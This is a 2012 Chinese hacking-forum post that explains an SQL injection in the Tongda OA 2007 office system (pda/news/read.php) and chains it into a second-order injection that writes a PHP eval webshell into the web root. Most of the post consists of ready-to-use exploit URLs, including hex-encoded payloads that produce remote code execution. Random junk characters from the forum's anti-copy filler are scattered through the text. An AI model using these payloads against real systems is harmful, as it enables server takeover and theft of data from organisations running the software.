找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2945|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本- b- o( Q' I' Z6 r0 O( _( M/ ?

7 \% Z) H6 f- M0 M0 x& C) l) Q ( m8 X3 X. m1 l/ M& u1 P
Office Anywhere 2007 网络智能办公系统
0 p: y4 E! T; g$ O* n . [+ J  @  o: `) Y1 @5 z
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..9 t) O& T; y& d

$ J; `8 b' t/ s) o0 A
1 U* Y& C* N# t; O这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
* H; w% \' D' Z
& o% C) E' [: j  r例如:SELECT * from USER where USER_ID='{$USERNAME}'  / s: k" K: z: D9 E8 y' f" o6 r3 T
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了9 g/ H: P- P* P6 n5 a$ b

! h3 c4 d; E, o1 }2 n这个时候我们是不是可以组合起来使用哪?
% @9 H- [5 a1 I5 p$ G
1 w+ _  v0 x1 E1 u/ W$ p第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样; L  ]8 A1 {; f8 I$ L2 \
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
8 o& a; N+ I$ G4 [2 T  e5 [$ |; O
- A. z9 I$ x$ G$ F3 m7 P* h这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
4 @  A2 U& M* R, |; ^) m ! u6 }+ n, }& _4 ?. q
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。! [( f! M2 F0 B6 G8 c7 I* n

, k- J3 k0 V/ P8 X5 h: q7 y那么我们用字符串格式带入进行hex编码  K- ~1 c& _( b  {7 X
1 O3 ?) e4 `1 c2 @/ |' ~
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23* O. T, o" L# i; y8 z

! ^! A2 m0 N1 V5 h测试ok,获取oa的webshell
2 G! L7 y) j. e- n& f 7 E0 o& o) z) w$ M' ~1 n

9 l' [. O/ t% @6 c5 Wpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23, m8 R0 h7 o4 X. V/ ~: C% V
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表